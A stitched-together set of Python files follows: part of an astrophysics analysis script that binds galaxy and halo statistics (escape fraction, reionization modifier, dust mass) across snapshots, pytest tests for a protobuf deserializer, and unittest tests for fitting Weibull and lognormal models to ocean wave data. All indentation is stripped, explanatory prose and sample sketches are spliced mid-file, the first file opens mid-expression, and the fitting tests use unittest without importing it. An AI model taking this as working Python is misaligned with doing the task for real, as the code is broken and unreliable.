m_gal_high)
(mean_photo_galaxy_array[current_model_number][snapshot_idx],
std_photo_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_photo_galaxy_array[current_model_number][snapshot_idx],
std_photo_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_photo_galaxy_local,
std_photo_galaxy_local,
N_local)
'''
## RSAGE Reionization Modifier ##
(mean_reionmod_galaxy_local, std_reionmod_galaxy_local, N_local,
sum_reionmod_galaxy_local, bin_middle) = AllVars.Calculate_2D_Mean(
mass_reionmod_gal, reionmod,
bin_width, m_gal_low,
m_gal_high)
(mean_reionmod_galaxy_array[current_model_number][snapshot_idx],
std_reionmod_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_reionmod_galaxy_array[current_model_number][snapshot_idx],
std_reionmod_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_reionmod_galaxy_local,
std_reionmod_galaxy_local,
N_local)
## Gnedin Reionization Modifier ##
(mean_gnedin_reionmod_galaxy_local, std_gnedin_reionmod_galaxy_local, N_local,
sum_gnedin_reionmod_galaxy_local, bin_middle) = AllVars.Calculate_2D_Mean(
mass_gal, gnedin_reionmod_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_gnedin_reionmod_galaxy_array[current_model_number][snapshot_idx],
std_gnedin_reionmod_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_gnedin_reionmod_galaxy_array[current_model_number][snapshot_idx],
std_gnedin_reionmod_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_gnedin_reionmod_galaxy_local,
std_gnedin_reionmod_galaxy_local,
N_local)
N_galaxy_array[current_model_number][snapshot_idx] += N_local
### Functions of Halos/Halo Mass ###
## Ejected Fraction ##
(mean_ejected_halo_local, std_ejected_halo_local, N_local, sum_ejected_halo, bin_middle) = AllVars.Calculate_2D_Mean(mass_central, ejected_fraction, bin_width, m_low, m_high)
(mean_ejected_halo_array[current_model_number][snapshot_idx], std_ejected_halo_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_ejected_halo_array[current_model_number][snapshot_idx], std_ejected_halo_array[current_model_number][snapshot_idx], N_halo_array[current_model_number][snapshot_idx], mean_ejected_halo_local, std_ejected_halo_local, N_local) # Then update the running total.
## Quasar Fraction ##
(mean_quasar_activity_local, std_quasar_activity_local,N_local, sum_quasar_activity_halo, bin_middle) = AllVars.Calculate_2D_Mean(mass_central, G.QuasarActivity[w_gal, current_snap], bin_width, m_low, m_high)
(mean_quasar_activity_array[current_model_number][snapshot_idx], std_quasar_activity_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_quasar_activity_array[current_model_number][snapshot_idx], std_quasar_activity_array[current_model_number][snapshot_idx], N_halo_array[current_model_number][snapshot_idx], mean_quasar_activity_local, std_quasar_activity_local, N_local) # Then update the running total.
## fesc Value ##
(mean_fesc_halo_local, std_fesc_halo_local, N_local, sum_fesc_halo, bin_middle) = AllVars.Calculate_2D_Mean(mass_central, fesc, bin_width, m_low, m_high)
(mean_fesc_halo_array[current_model_number][snapshot_idx], std_fesc_halo_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_fesc_halo_array[current_model_number][snapshot_idx], std_fesc_halo_array[current_model_number][snapshot_idx], N_halo_array[current_model_number][snapshot_idx], mean_fesc_halo_local, std_fesc_halo_local, N_local) # Then update the running total.
## Ngamma ##
#(mean_Ngamma_halo_local, std_Ngamma_halo_local, N_local, sum_Ngamma_halo, bin_middle) \
#= AllVars.Calculate_2D_Mean(mass_central, ionizing_photons, bin_width, m_low, m_high)
#mean_Ngamma_halo_local = np.divide(mean_Ngamma_halo_local, 1.0e50) ## Divide out a constant to keep the numbers manageable.
#std_Ngamma_halo_local = np.divide(std_Ngamma_halo_local, 1.0e50)
#(mean_Ngamma_halo_array[current_model_number][snapshot_idx], std_Ngamma_halo_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_Ngamma_halo_array[current_model_number][snapshot_idx], std_Ngamma_halo_array[current_model_number][snapshot_idx], N_halo_array[current_model_number][snapshot_idx], mean_Ngamma_halo_local, std_Ngamma_halo_local, N_local) # Then update the running total.
## Reionization Modifier ##
(mean_reionmod_halo_local, std_reionmod_halo_local, N_local, sum_reionmod_halo, bin_middle) = AllVars.Calculate_2D_Mean(mass_reionmod_central, reionmod, bin_width, m_low, m_high)
(mean_reionmod_halo_array[current_model_number][snapshot_idx], std_reionmod_halo_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_reionmod_halo_array[current_model_number][snapshot_idx], std_reionmod_halo_array[current_model_number][snapshot_idx], N_halo_array[current_model_number][snapshot_idx], mean_reionmod_halo_local, std_reionmod_halo_local, N_local) # Then update the running total.
## Total Dust Mass ##
(mean_dust_halo_local, std_dust_halo_local, N_local,
sum_dust_halo, bin_middle) = AllVars.Calculate_2D_Mean(
mass_centralgal_dust, total_dust_gal,
bin_width, m_low,
m_high)
(mean_dust_halo_array[current_model_number][snapshot_idx],
std_dust_halo_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_dust_halo_array[current_model_number][snapshot_idx],
std_dust_halo_array[current_model_number][snapshot_idx],
N_halo_array[current_model_number][snapshot_idx],
mean_dust_halo_local,
std_dust_halo_local,
N_local)
N_halo_array[current_model_number][snapshot_idx] += N_local
### Functions of redshift ###
## Ngamma ##
#sum_Ngamma_z_array[current_model_number][snapshot_idx] += np.sum(np.divide(ionizing_photons, 1.0e50)) # Remember that we're dividing out a constant!
## fesc Value ##
(mean_fesc_z_array[current_model_number][snapshot_idx], std_fesc_z_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_fesc_z_array[current_model_number][snapshot_idx], std_fesc_z_array[current_model_number][snapshot_idx], N_z[current_model_number][snapshot_idx], np.mean(fesc), np.std(fesc), len(w_gal)) # Updates the mean escape fraction for this redshift.
## Reionization Modifier ##
(mean_reionmod_z[current_model_number][snapshot_idx], std_reionmod_z[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_reionmod_z[current_model_number][snapshot_idx], std_reionmod_z[current_model_number][snapshot_idx], N_reionmod_z[current_model_number][snapshot_idx], np.mean(reionmod), np.std(reionmod), len(reionmod))
N_reionmod_z[current_model_number][snapshot_idx] += len(reionmod)
## Ejected Fraction ##
(mean_ejected_z[current_model_number][snapshot_idx],std_ejected_z[current_model_number][snapshot_idx]) \
= update_cumulative_stats(mean_ejected_z[current_model_number][snapshot_idx],
std_ejected_z[current_model_number][snapshot_idx],
N_z[current_model_number][snapshot_idx],
np.mean(ejected_fraction),
np.std(ejected_fraction),
len(w_gal))
N_z[current_model_number][snapshot_idx] += len(w_gal)
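The running totals above (via `update_cumulative_stats`) combine per-file summary statistics into global ones. A minimal standalone sketch of that pooling, assuming population standard deviations (ddof=0); the exact signature of `update_cumulative_stats` is not shown here, so the function name and argument order are hypothetical:

```python
import numpy as np

def pool_stats(mean_a, std_a, n_a, mean_b, std_b, n_b):
    """Combine the mean/std of two disjoint samples from their summaries
    (population std, ddof=0), as a running-total update would."""
    n = n_a + n_b
    mean = (n_a * mean_a + n_b * mean_b) / n
    # Within-group variances plus the between-group shift terms.
    var = (n_a * (std_a ** 2 + (mean_a - mean) ** 2)
           + n_b * (std_b ** 2 + (mean_b - mean) ** 2)) / n
    return mean, np.sqrt(var)

x = np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
m, s = pool_stats(x[:3].mean(), x[:3].std(), 3,
                  x[3:].mean(), x[3:].std(), 3)
# m, s match x.mean(), x.std() computed over the full sample.
```
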
#### Arrays that are just kept across snapshots ##
Ngamma_global[current_model_number][snapshot_idx].append(Ngamma_gal)
mass_global[current_model_number][snapshot_idx].append(mass_gal)
fesc_global[current_model_number][snapshot_idx].append(fesc)
#### Arrays that are function of fej ##
(mean_Ngamma_fej_local, std_Ngamma_fej_local, N_local,
sum_Ngamma_fej_local, bin_middle) = AllVars.Calculate_2D_Mean(
ejected_fraction, Ngamma_gal,
fej_bin_width, fej_low, fej_high)
(mean_Ngamma_fej[current_model_number][snapshot_idx],
std_Ngamma_fej[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_Ngamma_fej[current_model_number][snapshot_idx],
std_Ngamma_fej[current_model_number][snapshot_idx],
N_fej[current_model_number][snapshot_idx],
mean_Ngamma_fej_local,
std_Ngamma_fej_local,
N_local)
N_fej[current_model_number][snapshot_idx] += N_local
done_model[current_model_number] = 1
if (current_model_number < number_models):
keep_files = same_files[current_model_number] # Decide if we want to keep the files loaded or throw them out.
current_model_number += 1 # Update the inner loop model number.
#StellarMassFunction(PlotSnapList, SMF, simulation_norm, FirstFile,
# LastFile, NumFile, galaxy_halo_mass_mean, model_tags,
# 1, paper_plots, "wtf")
#plot_reionmod(PlotSnapList, SnapList, simulation_norm, mean_reionmod_halo_array,
#std_reionmod_halo_array, N_halo_array, mean_reionmod_z,
#std_reionmod_z, N_reionmod_z, False, model_tags,
#"reionmod_selfcon")
#plot_dust_scatter(SnapList, mass_gal_dust, mass_centralgal_dust, total_dust_gal,
# "dust_scatter")
#plot_dust(PlotSnapList, SnapList, simulation_norm, mean_dust_galaxy_array,
# std_dust_galaxy_array, N_galaxy_array, mean_dust_halo_array,
# std_dust_halo_array, N_halo_array, False, model_tags,
# "dustmass_total")
#plot_stellarmass_blackhole(PlotSnapList, simulation_norm, mean_BHmass_galaxy_array,
# std_BHmass_galaxy_array, N_galaxy_array,
# FirstFile, LastFile, NumFile,
# model_tags, "StellarMass_BHMass")
#plot_ejectedfraction(SnapList, PlotSnapList, simulation_norm,
# mean_ejected_halo_array, std_ejected_halo_array,
# N_halo_array, mean_ejected_z, std_ejected_z, N_z,
# model_tags, "ejectedfraction")
#plot_quasars_count(SnapList, PlotSnapList, N_quasars_z, N_quasars_boost_z, N_z, mean_quasar_activity_array, std_quasar_activity_array, N_halo_array, mergers_halo_array, SMF, mergers_galaxy_array, fesc_prescription, simulation_norm, FirstFile, LastFile, NumFile, model_tags, "SN_Prescription")
plot_fesc_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_fesc_galaxy_array, std_fesc_galaxy_array,
N_galaxy_array, mean_fesc_halo_array,
std_fesc_halo_array, N_halo_array,
galaxy_halo_mass_mean, model_tags,
paper_plots, mass_global, fesc_global, Ngamma_global,
"fesc_paper")
plot_reionmod_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_reionmod_galaxy_array, std_reionmod_galaxy_array,
N_galaxy_array, mean_gnedin_reionmod_galaxy_array,
std_gnedin_reionmod_galaxy_array,
model_tags, paper_plots, "reionmod")
exit()
#plot_nion_galaxy(SnapList, PlotSnapList, simulation_norm,
# mean_Ngamma_galaxy_array, std_Ngamma_galaxy_array,
# N_galaxy_array, model_tags,
# paper_plots, "Ngamma")
'''
plot_photo_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_photo_galaxy_array, std_photo_galaxy_array,
N_galaxy_array, model_tags,
paper_plots, "photo")
'''
plot_sfr_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_sfr_galaxy_array, std_sfr_galaxy_array,
mean_ssfr_galaxy_array, std_ssfr_galaxy_array,
N_galaxy_array, model_tags, "sSFR")
#plot_fej_Ngamma(SnapList, PlotSnapList, simulation_norm,
# mean_Ngamma_fej, std_Ngamma_fej,
# N_fej, model_tags, "Ngamma_fej")
#plot_photoncount(SnapList, sum_Ngamma_z_array, simulation_norm, FirstFile, LastFile, NumFile, model_tags, "Ngamma_test") ## PARALLEL COMPATIBLE
#plot_mvir_Ngamma(SnapList, mean_Ngamma_halo_array, std_Ngamma_halo_array, N_halo_array, model_tags, "Mvir_Ngamma_test", fesc_prescription, fesc_normalization, "/lustre/projects/p004_swin/jseiler/tiamat/halo_ngamma/") ## PARALLEL COMPATIBLE
# --- utils/deserializer/__tests__/test_protobuf_deserializer.py (repo: Mouse-BB-Team/Bot-Detection, license: MIT) ---
] | null | null | null | from utils.deserializer.protobuf_deserializer import ProtoLoader
from pathlib import Path
import pandas as pd
import pytest
PROTOFILES_DIR_PATH = str(Path(__file__).parent.joinpath("protofilesdir").absolute())
INVALID_PATH = "some/wrong/path"
@pytest.mark.parametrize('filepath', ["test_file.pb", "test_file_1.txt", "test_file_2.xml"])
def test_should_return_single_df_sequence_regardless_file_extension(filepath):
loader = ProtoLoader(PROTOFILES_DIR_PATH)
sequence = loader.get_single_sequence(filepath)
assert isinstance(sequence, pd.DataFrame)
def test_should_return_not_none_when_directory_not_empty():
loader = ProtoLoader(PROTOFILES_DIR_PATH)
seq_list = loader.get_list_of_sequences()
assert seq_list is not None
def test_should_return_correct_length_of_seq_list():
loader = ProtoLoader(PROTOFILES_DIR_PATH)
seq_list = loader.get_list_of_sequences()
assert len(seq_list) == 3
def test_should_return_empty_list_when_directory_empty():
loader = ProtoLoader(PROTOFILES_DIR_PATH + INVALID_PATH)
seq_list = loader.get_list_of_sequences()
assert len(seq_list) == 0
def test_should_check_for_list_when_directory_empty():
loader = ProtoLoader(PROTOFILES_DIR_PATH + INVALID_PATH)
seq_list = loader.get_list_of_sequences()
assert isinstance(seq_list, list)
def test_should_return_list_of_sequences():
loader = ProtoLoader(PROTOFILES_DIR_PATH)
seq_list = loader.get_list_of_sequences()
for seq in seq_list:
assert isinstance(seq, pd.DataFrame)
# --- tests/test_fitting.py (repo: adrdrew/viroconcom, license: MIT) ---
import csv
import numpy as np
from viroconcom.fitting import Fit
def read_benchmark_dataset(path='tests/testfiles/1year_dataset_A.txt'):
"""
Reads a dataset provided for the environmental contour benchmark.
Parameters
----------
path : string
Path to the dataset file, defaults to 'tests/testfiles/1year_dataset_A.txt'.
Returns
-------
x : ndarray of doubles
Observations of the environmental variable 1.
y : ndarray of doubles
Observations of the environmental variable 2.
x_label : str
Label of the environmental variable 1.
y_label : str
Label of the environmental variable 2.
"""
x = list()
y = list()
x_label = None
y_label = None
with open(path, newline='') as csv_file:
reader = csv.reader(csv_file, delimiter=';')
idx = 0
for row in reader:
if idx == 0:
x_label = row[1][
1:] # Ignore first char (is a white space).
y_label = row[2][
1:] # Ignore first char (is a white space).
if idx > 0: # Ignore the header
x.append(float(row[1]))
y.append(float(row[2]))
idx = idx + 1
x = np.asarray(x)
y = np.asarray(y)
return (x, y, x_label, y_label)
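The parsing above assumes a semicolon-delimited layout of "index; var1; var2" with a one-line header. A minimal self-contained sketch of the same loop against an in-memory stand-in (the sample rows are made up for illustration):

```python
import csv
import io
import numpy as np

# In-memory stand-in for a benchmark file: header, then "index; var1; var2".
raw = ("i; significant wave height (m); zero-up-crossing period (s)\n"
       "0; 1.2; 5.1\n"
       "1; 0.8; 4.7\n")

x, y = [], []
for idx, row in enumerate(csv.reader(io.StringIO(raw), delimiter=';')):
    if idx == 0:
        x_label, y_label = row[1][1:], row[2][1:]  # drop the leading space
    else:
        x.append(float(row[1]))
        y.append(float(row[2]))
x, y = np.asarray(x), np.asarray(y)
```
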
class FittingTest(unittest.TestCase):
def test_2d_fit(self):
"""
2-d Fit with Weibull and Lognormal distribution.
"""
prng = np.random.RandomState(42)
# Draw 1000 samples from a Weibull distribution with shape=1.5 and scale=3,
# which represents significant wave height.
sample_1 = prng.weibull(1.5, 1000)*3
# Let the second sample, which represents spectral peak period increase
# with significant wave height and follow a Lognormal distribution with
# mean=2 and sigma=0.2
sample_2 = [0.1 + 1.5 * np.exp(0.2 * point) +
prng.lognormal(2, 0.2) for point in sample_1]
# Describe the distribution that should be fitted to the sample.
dist_description_0 = {'name': 'Weibull_3p',
'dependency': (None, None, None),
'width_of_intervals': 2}
dist_description_1 = {'name': 'Lognormal',
'dependency': (None, None, 0),
'functions': (None, None, 'exp3')}
# Compute the fit.
my_fit = Fit((sample_1, sample_2),
(dist_description_0, dist_description_1))
dist0 = my_fit.mul_var_dist.distributions[0]
dist1 = my_fit.mul_var_dist.distributions[1]
self.assertAlmostEqual(dist0.shape(0), 1.4165147571863412, places=5)
self.assertAlmostEqual(dist0.scale(0), 2.833833521811032, places=5)
self.assertAlmostEqual(dist0.loc(0), 0.07055663251419833, places=5)
self.assertAlmostEqual(dist1.shape(0), 0.17742685807554776 , places=5)
#self.assertAlmostEqual(dist1.scale, 7.1536437634240135+2.075539206642004e^{0.1515051024957754x}, places=5)
self.assertAlmostEqual(dist1.loc, None, places=5)
# Now use a 2-parameter Weibull distribution instead of 3-p distr.
dist_description_0 = {'name': 'Weibull_2p',
'dependency': (None, None, None),
'width_of_intervals': 2}
dist_description_1 = {'name': 'Lognormal',
'dependency': (None, None, 0),
'functions': (None, None, 'exp3')}
my_fit = Fit((sample_1, sample_2),
(dist_description_0, dist_description_1))
self.assertEqual(str(my_fit)[0:5], 'Fit()')
def test_2d_benchmark_case(self):
"""
Reproduces the baseline results presented in doi: 10.1115/OMAE2019-96523 .
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset(
path='tests/testfiles/allyears_dataset_A.txt')
# Describe the distribution that should be fitted to the sample.
dist_description_0 = {'name': 'Weibull_3p',
'dependency': (None, None, None),
'width_of_intervals': 0.5}
dist_description_1 = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
'functions': ('exp3', None, 'power3')} # Shape, location, scale.
# Compute the fit.
my_fit = Fit((sample_hs, sample_tz),
(dist_description_0, dist_description_1))
# Evaluate the fitted parameters.
dist0 = my_fit.mul_var_dist.distributions[0]
dist1 = my_fit.mul_var_dist.distributions[1]
self.assertAlmostEqual(dist0.shape(0), 1.48, delta=0.02)
self.assertAlmostEqual(dist0.scale(0), 0.944, delta=0.01)
self.assertAlmostEqual(dist0.loc(0), 0.0981, delta=0.001)
self.assertAlmostEqual(dist1.shape.a, 0, delta=0.001)
self.assertAlmostEqual(dist1.shape.b, 0.308, delta=0.002)
self.assertAlmostEqual(dist1.shape.c, -0.250, delta=0.002)
self.assertAlmostEqual(dist1.scale.a, 1.47, delta=0.02)
self.assertAlmostEqual(dist1.scale.b, 0.214, delta=0.002)
self.assertAlmostEqual(dist1.scale.c, 0.641, delta=0.002)
self.assertAlmostEqual(dist1.scale(0), 4.3, delta=0.1)
self.assertAlmostEqual(dist1.scale(2), 6, delta=0.1)
self.assertAlmostEqual(dist1.scale(5), 8, delta=0.1)
def test_2d_exponentiated_wbl_fit(self):
"""
Tests if a 2D fit that includes an exp. Weibull distribution works.
"""
prng = np.random.RandomState(42)
# Draw 1000 samples from a Weibull distribution with shape=1.5 and scale=3,
# which represents significant wave height.
sample_hs = prng.weibull(1.5, 1000)*3
# Let the second sample, which represents zero-upcrossing period increase
# with significant wave height and follow a Lognormal distribution with
# mean=2 and sigma=0.2
sample_tz = [0.1 + 1.5 * np.exp(0.2 * point) +
prng.lognormal(2, 0.2) for point in sample_hs]
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
# Shape, Location, Scale, Shape2
'width_of_intervals': 0.5}
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('exp3', None, 'power3')
# Shape, Location, Scale
}
# Fit the model to the data, first test a 1D fit.
fit = Fit(sample_hs, dist_description_hs)
# Now perform the 2D fit.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
dist0 = fit.mul_var_dist.distributions[0]
self.assertGreater(dist0.shape(0), 1) # Should be about 1.5.
self.assertLess(dist0.shape(0), 2)
self.assertIsNone(dist0.loc(0)) # Has no location parameter, should be None.
self.assertGreater(dist0.scale(0), 2) # Should be about 3.
self.assertLess(dist0.scale(0), 4)
self.assertGreater(dist0.shape2(0), 0.5) # Should be about 1.
self.assertLess(dist0.shape2(0), 2)
def test_fit_lnsquare2(self):
"""
Tests a 2D fit that includes a logarithmic square dependence function.
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset()
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
# Shape, Location, Scale, Shape2
'width_of_intervals': 0.5}
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('exp3', None, 'lnsquare2')
# Shape, Location, Scale
}
# Fit the model to the data.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
# Check whether the logarithmic square fit worked correctly.
dist1 = fit.mul_var_dist.distributions[1]
self.assertGreater(dist1.scale.a, 1) # Should be about 1-5
self.assertLess(dist1.scale.a, 5) # Should be about 1-5
self.assertGreater(dist1.scale.b, 2) # Should be about 2-10
self.assertLess(dist1.scale.b, 10) # Should be about 2-10
self.assertGreater(dist1.scale(0), 0.1)
self.assertLess(dist1.scale(0), 10)
self.assertEqual(dist1.scale.func_name, 'lnsquare2')
def test_fit_powerdecrease3(self):
"""
Tests a 2D fit that includes a powerdecrease3 dependence function.
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset()
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
# Shape, Location, Scale, Shape2
'width_of_intervals': 0.5}
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('powerdecrease3', None, 'lnsquare2')
# Shape, Location, Scale
}
# Fit the model to the data.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
# Check whether the powerdecrease3 fit worked correctly.
dist1 = fit.mul_var_dist.distributions[1]
self.assertGreater(dist1.shape.a, -0.1) # Should be about 0
self.assertLess(dist1.shape.a, 0.1) # Should be about 0
self.assertGreater(dist1.shape.b, 1.5) # Should be about 2-5
self.assertLess(dist1.shape.b, 6) # Should be about 2-10
self.assertGreater(dist1.shape.c, 0.8) # Should be about 1.1
self.assertLess(dist1.shape.c, 2) # Should be about 1.1
self.assertGreater(dist1.shape(0), 0.25) # Should be about 0.35
self.assertLess(dist1.shape(0), 0.4) # Should be about 0.35
self.assertEqual(dist1.shape.func_name, 'powerdecrease3')
def test_fit_asymdecrease3(self):
"""
Tests a 2D fit that includes an asymdecrease3 dependence function.
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset()
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
# Shape, Location, Scale, Shape2
'width_of_intervals': 0.5}
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('asymdecrease3', None, 'lnsquare2')
# Shape, Location, Scale
}
# Fit the model to the data.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
# Check whether the asymdecrease3 fit worked correctly.
dist1 = fit.mul_var_dist.distributions[1]
self.assertAlmostEqual(dist1.shape.a, 0, delta=0.1) # Should be about 0
self.assertAlmostEqual(dist1.shape.b, 0.35, delta=0.4) # Should be about 0.35
self.assertAlmostEqual(np.abs(dist1.shape.c), 0.45, delta=0.2) # Should be about 0.45
self.assertAlmostEqual(dist1.shape(0), 0.35, delta=0.2) # Should be about 0.35
def test_min_number_datapoints_for_fit(self):
"""
Tests if the minimum number of datapoints required for a fit works.
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset()
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
# Shape, Location, Scale, Shape2
'width_of_intervals': 0.5}
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('exp3', None, 'lnsquare2'),
# Shape, Location, Scale
'min_datapoints_for_fit': 10
}
# Fit the model to the data.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
# Check whether the logarithmic square fit worked correctly.
dist1 = fit.mul_var_dist.distributions[1]
a_min_10 = dist1.scale.a
# Now require more datapoints for a fit.
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('exp3', None, 'lnsquare2'),
# Shape, Location, Scale
'min_datapoints_for_fit': 500
}
# Fit the model to the data.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
# Check whether the logarithmic square fit worked correctly.
dist1 = fit.mul_var_dist.distributions[1]
a_min_500 = dist1.scale.a
# Because fewer bins have been used in the second case, we should get
# different coefficients for the dependence function.
self.assertNotEqual(a_min_10, a_min_500)
def test_multi_processing(self):
"""
2-d Fit with multiprocessing (specified by setting a value for timeout)
"""
# Define a sample and a fit.
prng = np.random.RandomState(42)
sample_1 = prng.weibull(1.5, 1000)*3
sample_2 = [0.1 + 1.5 * np.exp(0.2 * point) +
prng.lognormal(2, 0.2) for point in sample_1]
dist_description_0 = {'name': 'Weibull',
'dependency': (None, None, None),
'width_of_intervals': 2}
dist_description_1 = {'name': 'Lognormal',
'dependency': (None, None, 0),
'functions': (None, None, 'exp3')}
# Compute the fit.
my_fit = Fit((sample_1, sample_2),
(dist_description_0, dist_description_1),
timeout=10)
def test_wbl_fit_with_negative_location(self):
"""
Tests fitting a translated Weibull distribution which would result
in a negative location parameter.
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset()
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_3p',
'dependency': (None, None, None)}
# Fit the model to the data.
fit = Fit((sample_hs, ),
(dist_description_hs, ))
# Correct values for 10 years of data can be found in
# 10.1115/OMAE2019-96523. Here we used 1 year of data.
dist0 = fit.mul_var_dist.distributions[0]
self.assertAlmostEqual(dist0.shape(0) / 10, 1.48 / 10, places=1)
self.assertGreater(dist0.loc(0), 0.0) # Should be 0.0981
self.assertLess(dist0.loc(0), 0.3) # Should be 0.0981
self.assertAlmostEqual(dist0.scale(0), 0.944, places=1)
# Shift the wave data by -2 m and fit again.
sample_hs = sample_hs - 2
# Negative location values will be set to zero instead and a
# warning will be raised.
with self.assertWarns(RuntimeWarning):
fit = Fit((sample_hs, ),
(dist_description_hs, ))
dist0 = fit.mul_var_dist.distributions[0]
self.assertAlmostEqual(dist0.shape(0) / 10, 1.48 / 10, places=1)
# Should be estimated to be 0.0981 - 2 and corrected to be 0.
self.assertEqual(dist0.loc(0), 0)
self.assertAlmostEqual(dist0.scale(0), 0.944, places=1)
def test_omae2020_wind_wave_model(self):
"""
Tests fitting the wind-wave model that was used in the publication
'Global hierarchical models for wind and wave contours' on dataset D.
"""
sample_v, sample_hs, label_v, label_hs = read_benchmark_dataset(path='tests/testfiles/1year_dataset_D.txt')
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'fixed_parameters' : (None, None, None, 5), # shape, location, scale, shape2
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('logistics4', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20}
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
dist0 = fit.mul_var_dist.distributions[0]
self.assertAlmostEqual(dist0.shape(0), 2.42, delta=1)
self.assertAlmostEqual(dist0.scale(0), 10.0, delta=2)
self.assertAlmostEqual(dist0.shape2(0), 0.761, delta=0.5)
dist1 = fit.mul_var_dist.distributions[1]
self.assertEqual(dist1.shape2(0), 5)
inspection_data1 = fit.multiple_fit_inspection_data[1]
self.assertEqual(inspection_data1.shape2_value[0], 5)
self.assertAlmostEqual(inspection_data1.shape_value[0], 0.8, delta=0.5) # interval centered at 1
self.assertAlmostEqual(inspection_data1.shape_value[4], 1.5, delta=0.5) # interval centered at 9
self.assertAlmostEqual(inspection_data1.shape_value[9], 2.5, delta=1) # interval centered at 19
self.assertAlmostEqual(dist1.shape(0), 0.8, delta=0.3)
self.assertAlmostEqual(dist1.shape(10), 1.6, delta=0.5)
self.assertAlmostEqual(dist1.shape(20), 2.3, delta=0.7)
self.assertAlmostEqual(dist1.shape.a, 0.582, delta=0.5)
self.assertAlmostEqual(dist1.shape.b, 1.90, delta=1)
self.assertAlmostEqual(dist1.shape.c, 0.248, delta=0.5)
self.assertAlmostEqual(dist1.shape.d, 8.49, delta=5)
self.assertAlmostEqual(inspection_data1.scale_value[0], 0.15, delta=0.2) # interval centered at 1
self.assertAlmostEqual(inspection_data1.scale_value[4], 1, delta=0.5) # interval centered at 9
self.assertAlmostEqual(inspection_data1.scale_value[9], 4, delta=1) # interval centered at 19
self.assertAlmostEqual(dist1.scale(0), 0.15, delta=0.5)
self.assertAlmostEqual(dist1.scale(10), 1, delta=0.5)
self.assertAlmostEqual(dist1.scale(20), 4, delta=1)
self.assertAlmostEqual(dist1.scale.a, 0.394, delta=0.5)
self.assertAlmostEqual(dist1.scale.b, 0.0178, delta=0.1)
self.assertAlmostEqual(dist1.scale.c, 1.88, delta=0.8)
def test_wrong_model(self):
"""
Tests whether errors are raised when incorrect fitting models are
specified.
"""
sample_v, sample_hs, label_v, label_hs = read_benchmark_dataset(path='tests/testfiles/1year_dataset_D.txt')
# This structure is incorrect as there is no distribution called 'something'.
dist_description_v = {'name': 'something',
'dependency': (None, None, None, None),
'fixed_parameters': (None, None, None, None), # shape, location, scale, shape2
'width_of_intervals': 2}
with self.assertRaises(ValueError):
# Fit the model to the data.
fit = Fit((sample_v, ),
(dist_description_v, ))
# This structure is incorrect as there is no dependence function called 'something'.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
